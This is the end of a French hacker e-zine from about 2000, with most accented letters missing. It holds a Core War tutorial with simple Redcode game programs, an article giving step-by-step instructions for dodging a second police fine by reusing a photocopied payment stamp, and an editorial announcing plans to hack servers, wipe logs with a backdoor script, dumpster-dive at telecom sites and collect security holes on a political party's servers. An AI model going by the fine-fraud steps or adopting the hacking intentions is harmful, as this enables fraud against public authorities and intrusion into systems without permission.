 X sans aucun symbole signifie X cases memoires avant ou apres celle ou se situe l'instruction (adressage relatif)
@X signifie la valeur de l'argument de la Xime case avant ou aprs celle-ci, cette case doit forcemment contenir une instruction de type DAT (adressage relatif indirect)


Un soldat se charge dans la pseudo-mmoire. Il xcute son instruction, puis saute  la case d'aprs (sauf si l'instruction est un saut, dans ce cas il ne va pas  la case suivante mais  la case indique par le saut). L ilattend un moment que le profgrammme adverse execute un instruction puis il execute lui aussi un instruction, et ainsi a tour de rle jusqu' la mort de l'un des deux. Pour tuer l'adversaire, il faut le balancer sur un DAT pour qu'il perde la partie au moment de jouer. Ce n'est pas simple car les soldats balayent tout sur leur passage avant de s'installer.

Je sais ca parait un peu abstrait mais je vais expliquer par l'exemple. Commencez par telecharger un emulateur de CoreWar, personnellement j'aime bien l'environnement de developpement CoreWar de Michel Casabianca, parcequ'il est en Java, donc ca marche partout, mais il y en a d'autres.

Voici le programme soldat le plus simple: le rouleau compresseur ou IMP. Code source:

MOV 0 1

Le programme se lance. Il execute son instruction qui est de copier le contenu de la case actuelle (c'est  dire MOV 0 1 ) sur la suivante puis passe  la suivante, o il xcutera la mme instruction puis encore la case suivante, o il rexecutera la meme chose etc etc...
Le rouleau compresseur fais donc le menage sur la case suivante, laisse son adversaire jouer, ppuis passe  la case suivante et fait le menage sur la case qui suit, ...
Ce programme quoique simple est trs efficace pour s'entrainer  la preogrammation. Un exercice est la programmation d'un soldat anti IMP
Exemple de solution (trs connue donc pas de moi): Le RADAR. Code source :

***PHASE 1***
mov	#1	-100
add	#19	14
mov	#0	@13
cmp	#1	-103
jmp	-3
***PHASE 2***
mov	@11	@12
cmp	#1	10
jmp	4
add	#1	8
add	#1	8
jmp	-5
mov	#-16	-129
mov	#-16	-129
mov	#-150	-129
JMP	-147
dat	-16
dat	-16
dat	-150
Analyse : le Radar commence par mov #1 -100, c'est  dire que la centime case avant celle-ci est devenue DAT 1, cette case est un "pige". Ensuite il ajoute 19  la valeur de la 14me case aprs celle de l'instruction, c'est  dire que le DAT -16 devient DAT 3, puis il met la valeur 0 (donc DAT 0) sur la case indique par la valeur de la case prcdement modifie (l'ex DAT -16). Ensuite il verf=ifie que le "pige" n'a pas boug puis il recommence  la ligne add #19 14 (c'est un systme de boucle). Ds qu'un IMP est trop prs, la case pige est modifie, le Radar entre en phase 2. Durant celle-ci, il met en place une copie du programme dans la memoire, cette copie est place un peu au dessus de la position de l'ex-case pige. Une fois la copie termine, il saute directement sur la copie et reprend son activit.
En clais, le Radar guette l'arrive de l'IMP. Tant qu'il ne s'approche pas, le Radar bombarde la mmoire en esprant tomber par hasard sur la case de l'IMP, probabilit faible. Ds que l'IMP est  trop prs, le Radar se met ailleurs et recommence son bombardement.
Le problme, c'est qu'en bombardant tout  tord et  travers, le Radar, finit par se toucher li mme et  s'auto-dtruire. Cette solution est efficace de temps en temps, mais pas  100%, contrairement au soldat que voici :
Deuxime solution : l'AntIMP
Source

jmp 2
jmp 23
mov -1 -3
mov -2 -5
mov -3 -7
mov -4 -9
mov -5 -11
mov -6 -13
mov -7 -15
mov -8 -17
mov -9 -19
mov -10 -21
jmp  -10

Le programme ne fait rien d'autre que de pieger les 10 cases qui sont avant. S'il est probable, qu'il echappe aux deux premires, il est statistiquement peu probable que l'IMP depasse la quatrime, et mathmatiquement impossible qu'il echappe aux six premieres cases.
Ds qu'il tombe sur une case pige, l'IMP saute de 23 cases, l o l'attend une commande DAT, et hop il a perdu.


Il existe d'autres soldats, mais le mieux est de les programmer soi mme, ce n'est pas si dur si on suit un plan ordonn, et si on connait un peu l'assembleur. Ensuite faites donc des concours avec vos amis pour voir qui survit, ou cherchez donc  faire un soldat qui dtruise un soldat spcifique (comme l'AntIMP). Mais n'oubliez pas, plus votre soldat est complet et comporte d'instructions, plus il est lent par rapport au programme adverse. Le soldat parfait n'existe pas.


Bon j'espere que cet article vous aura dcid de vous mettre au sport du CoreWar. J'ai essay d'tre le plus clair possible mais c'est vraiment pas simple, ni de comprendre, ni d'expliquer. Envoyez moi les sources vos crations (par e-mail, ou alors je suis souvent sur l'IRC neoserv), je fais la collection de soldats, et puis j'essayerai de faire un soldat qui dtruise le votre. Ahalala quel bon jeu.
(Nd Ad-Tonnou ---> 'sont fous ces ricains...)

Tun!Z 2000


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Pas Payer Ses Amendes							  720	
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


				******************************************************** 
				** COMMENT NE PAS PAYER UNE AMENDES DE FLICS 2 FOIS?? ** 
				********************************************************

Tout d'abbord je vais vous raconter comment nous avons du avoir recours a cette technique: moi (7 20) et ad-tonnou tions tranquillement sur un scooter (Nd Ad-tonnou --> le mien) entrain de revenir du lyce tranquillement sauf que moi j'avais pas de casque (c est con hein), on tais donc tranquille, les cours finis donc heureux!! et a un carrefour j'aperois une clio bleu!!

"eh ad j'ai vu une clio bleu ls bas...!"
"hein t'es pas drole 7 20 (prononc sept vingt) mais si je te jure!!"
"pffff..."

et l : pin pon pin pon pin pon putain accelere accelere y nous course (manque de chance on etais dans une monte avec son vieux scoot pourrie on est pas all loin :-((donc on se fait choper (y nous on pas grill pour le delit de fuite)) par deux gros bof en uniforme, rsultat: 600 F d amende!! :-(((((((((((((((((((((((((((((((((((((

Bref dgout surtout que de ne pas mettre de casque n'engage que nous on ne fait courrir de risques a personne merde!
Encore une loi dbile mais bon c'est un moyen comme un autre de nous pomper du fric (il est drole l etat, il veut notre scurit mais il nous la fait payer il est si attentionn, il est gentil l'etat hien??)

Bon la technique ne marche que pour une amende dj pay mais la deuxime on la paye pas!! (ni le 3eme, la 4eme etc...)quand on a une amende on doit la payer avec un timbre special que l'on achete dans les tabacs..
On a en fait un gros timbre que l'on envoie avec l'amende et un petit que l'on garde comme preuve de paiement sur un talon: 

(ND AD --> Schema manquant, 720 est parti en vacance et son ascii est mal pass, encore une fois dsols...)


bon vous savez maintenant a quoi ressemble une amende...donc voila ce que vous devez faire avec la premire amende: vous ne coller pas le gros timbre mais vous le posez sur l amende et vous faite une photocopie comme a ni vu ni connue, vous gardez la photocop et vous planker l amende ainsi que le gros timbre (vous le garder pour une prochaine amende quoi) bon maintenant vous coller avec pas trop de salive le petit timbre sur le reut normal quoi.. puis vous faite rien: soit personne ne va rien vous demander soit les flics vont venir ou vous envoyer une amende plus grosse!!vous vous plaignez vous leur montrer la photocop et le talon et il pourrons rien dire...
Ohlala ! La poste c'est nul ca perd tout le temps du courrier !!!(surtout les amendes qu'on estcens envoyer)
Donc vous avez paye mais si vous avez une deuxieme amende du meme prix vous pay pas!!alors vous dcoller le petit timbre a la vapeur (facile) et vous pouver payer l amende tranquillement......

CA MARCHE on l a fait.. avec ad (Nd ad ---> c moi :)) car on avait dj eut une autre amende avant!!! :-))(le seul truc c est qu il faut pas que les flics relevent le numero de serie du petit timbresinon vous pouver vous faire grill car si ils voient que le timbre  t utilis 2 foisils vont se poser des question (remarque je sais pas tellement y sont cons :-)))(Nd ad-tonnou ---> on l'a fait et vous riskez qu'une amende plus grosse...nous on a conomis 600 balles comme cela...)
 

=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=
	Le Mot De La Fin											Ad-Tonnou
=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=

Voila, c'est fini...
Biensur j'espere que vous aurez aprecie ce mag et les articles le composant...
Le #2 est prevu pour dans un mois, on l'a deja commenc:
Pour ma part ---> Deux autre tutoriaux sur le turbo pascal, on passe a la vitesse superieure...
		      La suite de l'article sur le TCP/IP, comparaison du modele OSI et du DoD
Sauron ---------> Un article sur Linux, pour changer..  :-)

Je crois que j'ai un article sur la programmation en cours...

On a prevu pas mal d'autres articles:
	--> moi je veux ouvrir un dossier sur le paranormal, le mois prochain je vais soit etudie pour vous l'affaire de                   	    Roswellet ce qu'on nous cache ou bien le phenomene des monsieurs tout noirs et pas beaux, j'ai nomme les MIB, men                        	    in black (pas ceux du film, les vrais)
      --> on va aussi se concentrer sur le hacking/Linux : ou et comment trouver des shells, la suite de l'article de   	    Sauron (tres petit mais fait au dernier moment)
	--> on vous hack aussi minimum 5 servers, avec explications a l'appui pour se faire pardonner du manque de haclking    	    dans ce mag
	--> Trashing Reports...ca vous rapelle rien ??? c'est une rubrique qui fut a la base cree par le mag Cryptel...720 et 	    moi on a repere de jolies poubelles FT avec seulement 5 groupes de 3 sentinelles + des chiens + barrieres 	    electriques...
	    Du gateau quoi... ;-)
	--> peut etre une autre backdoor (script shell) a foutre sur vos shells pour effacer les logs...
	--> Un dossier sur la triangulation et les autres techniques de tracage des portables...
	--> configuration d'une connexion ppp sous nux
	--> Info about FN...j'ai repere pas mal de servers du FN...on va organiser une collecte d'infos a propos de ces sites   	    ( security holes, OS, users...)

Et beaucoup d'autres encore...
J'attends biensur vos commentaires a propos de ce premier essai de zine...
Je vous garantie un #2 encore meilleur...



--== ALLIANX ==--

Pour nous joindre...

Chan de la team --> server: irc.irc2k.net         chan: #allianX

Ad-Tonnou 	--> 0800 010 800...bal 4540.....vous appelez, quand la dame parle, appuyez sur 9, puis *, puis 4540 (en dehors 		  des heures de buro) (c'est gratuit)

Redfire   	--> redfire@ifrance.com

720       	--> Vleyrit@yahoo.fr (ne me demandez pas pourquoi ce mail, j'ai jamais compris)

Tun!z2000 	--> Tuniz2000@yahoo.com  

Sauron    	--> Humour@humour.com  

FT-One    	--> ft_one@meloo.com

[-ahfeelinux]  --> ahfeelinux@caramail.com 




Merci a ceux qui nous ont motives pour ce zine...et merci a vous de nous lire...



